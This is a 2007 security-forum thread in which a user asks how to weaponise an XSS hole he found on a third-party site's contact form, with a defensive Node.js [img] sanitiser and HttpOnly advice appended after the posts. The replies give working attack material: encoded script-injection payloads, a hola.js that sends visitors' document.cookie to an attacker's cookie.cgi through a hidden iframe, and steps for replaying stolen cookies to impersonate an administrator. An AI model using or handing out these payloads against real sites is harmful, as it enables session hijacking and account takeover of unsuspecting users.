IT Security and Insecurity Portal

XSS on Forum - remote PHP shell or cookie.cgi questions

Posted: Thu Dec 20, 2007 1:27 am
onetwothree (Beginner) | Joined: Oct 20, 2007 | Posts: 3
I found a website that is vulnerable to an XSS attack via a contact forum. I am able to post the following popup;
[img]>"><ScRiPt%20%0a%0d>alert(1379844939)%3B</ScRiPt>.[/img]

Now I have found a cookie logging cgi script that is in place on "my server" but I am not sure how to encode the path to my remote cookie stealer as the encoding above.

My questions are these:
1. What type of encoding is the script above?
2. Can I modify the above to call a php shell (c99), or to steal visitors' cookies with my cookie.cgi script?

Thanks in advance for help pointing me in the right direction.

Posted: Thu Dec 20, 2007 3:18 pm
waraxe (Site admin) | Joined: May 11, 2004 | Posts: 2407 | Location: Estonia, Tartu
First of all, forget c99 shell in this stage of actions. You are going to steal the cookie, so the ultimate goal right now is to have the user's plaintext password, password hash or session ID. And if you can use this information to impersonate the victim (usually admin), then maybe you can somehow reach php shell level. This specific target seems to have some input filtering in place, so it probably needs some testing and probing.
My suggestion is something like

Code:
[img]>"><ScRiPt%20%0a%0dsrc%3Dhttp%3A%2F%2Fmyhosting.com%2Fjs.js></ScRiPt>.[/img]

And then put the javascript file on your hosting server and that js will do the cookie stealing by image url, for example.

Re: XSS on Forum - remote PHP shell or cookie.cgi questions
Posted: Wed Mar 12, 2008 2:22 am
Oilik (Active user) | Joined: Mar 05, 2008 | Posts: 35
onetwothree wrote:
    I found a website that is vulnerable to an XSS attack via a contact forum. I am able to post the following popup;
    [img]>"><ScRiPt%20%0a%0d>alert(1379844939)%3B</ScRiPt>.[/img]

    Now I have found a cookie logging cgi script that is in place on "my server" but I am not sure how to encode the path to my remote cookie stealer as the encoding above.

    My questions are these:
    1. What type of encoding is the script above?
    2. Can I modify the above to call a php shell (c99), or to steal visitors' cookies with my cookie.cgi script?

    Thanks in advance for help pointing me in the right direction.

Since this is only XSS, you can only put client-side scripting in there. You will need to steal a cookie [mm yummy].
I suggest doing:

Code:
[img]>"><script src=http://yoursite.com/hola.js>[/img]

And in hola.js on yoursite.com, put the following code:

Code:
document.write('<iframe src="http://yoursite.com/cookie.cgi?cookie=' + document.cookie + '" border="0" height="0px" width="0px"></iframe>');

Not the best way to do it, but gets the job done.

Then once you have the cookie [if you have firefox get AnEC, and just edit the values or add them, and ignore this]:
go to your browser and put:

Code:
javascript:void(document.cookie='cookie=here');

or something like that, I suggest 1 cookie at a time.
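All three posts above depend on one server-side defect: the forum copies whatever sits between [img] and [/img] into an HTML attribute without checking that it is a URL or encoding it, and the payloads use URL percent-encoding (%20, %0a, %0d, %3B, %3A, %2F) so that a literal-string filter for "<script>" does not see the tag until the renderer has decoded it. The following Node.js renderer is an added example written for this page, not code from the thread or from waraxe.us; it shows the check a forum should have applied. The [img] tag syntax, the assumption that the renderer percent-decodes the tag body before validating it (which the quoted payloads count on), and the function names are my own. The constructed samples are the three payloads quoted in the thread plus one ordinary image URL.

```javascript
// Added example (not code from the thread): a defensive renderer for
// [img]...[/img] BBCode. Assumptions of my own: the forum turns
// [img]URL[/img] into <img src="URL">, and it percent-decodes the tag body
// before checking it, which is what the payloads in the thread rely on.

const IMG_TAG = /\[img\]([\s\S]*?)\[\/img\]/gi;

// Percent-decode until the string stops changing (bounded), so that
// %3C, %20, %0a, %0d, %3B and double-encoded variants are checked decoded.
function fullyDecode(s) {
  let cur = s;
  for (let i = 0; i < 4; i++) {
    let next;
    try {
      next = decodeURIComponent(cur);
    } catch {
      break; // malformed escape such as a lone "%": keep what we have
    }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// HTML-escape text and attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Return a canonical http(s) URL, or null if the tag body is not a plain
// absolute URL. Whitespace, quotes, angle brackets or backslashes surviving
// the decode are grounds for rejecting the tag, not for "cleaning" it.
function safeImageUrl(body) {
  const decoded = fullyDecode(body.trim());
  if (/[\s<>"'\\]/.test(decoded)) return null;
  let url;
  try {
    url = new URL(decoded);
  } catch {
    return null; // relative or scheme-less text such as  >"><ScRiPt ...
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  return url.href;
}

// Render a post body: [img] tags with a safe URL become <img>; everything
// else, rejected tags included, is emitted HTML-escaped.
function renderBBCode(text) {
  let out = '';
  let last = 0;
  for (const m of text.matchAll(IMG_TAG)) {
    out += escapeHtml(text.slice(last, m.index));
    const url = safeImageUrl(m[1]);
    out += url ? `<img src="${escapeHtml(url)}" alt="">` : escapeHtml(m[0]);
    last = m.index + m[0].length;
  }
  return out + escapeHtml(text.slice(last));
}

// Constructed samples: the three payloads quoted in the thread plus a legitimate URL.
const SAMPLES = [
  '[img]>"><ScRiPt%20%0a%0d>alert(1379844939)%3B</ScRiPt>.[/img]',
  '[img]>"><ScRiPt%20%0a%0dsrc%3Dhttp%3A%2F%2Fmyhosting.com%2Fjs.js></ScRiPt>.[/img]',
  '[img]>"><script src=http://yoursite.com/hola.js>[/img]',
  '[img]http://example.com/logo.png[/img]',
];

for (const s of SAMPLES) {
  console.log(renderBBCode(s));
}
```

Run with `node` to see the three payloads come out as escaped text while the last sample becomes an `<img>` element. The decode-then-validate order matters: validating the raw string would pass `%3Cscript%3E` untouched and leave the decode for the browser or a later filter to do. The other half of the thread's technique, reading `document.cookie` from an injected script, is independent of this fix and is closed by issuing the session cookie with the HttpOnly flag, which keeps it out of script reach entirely.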
Powered by phpBB © 2001-2008 phpBB Group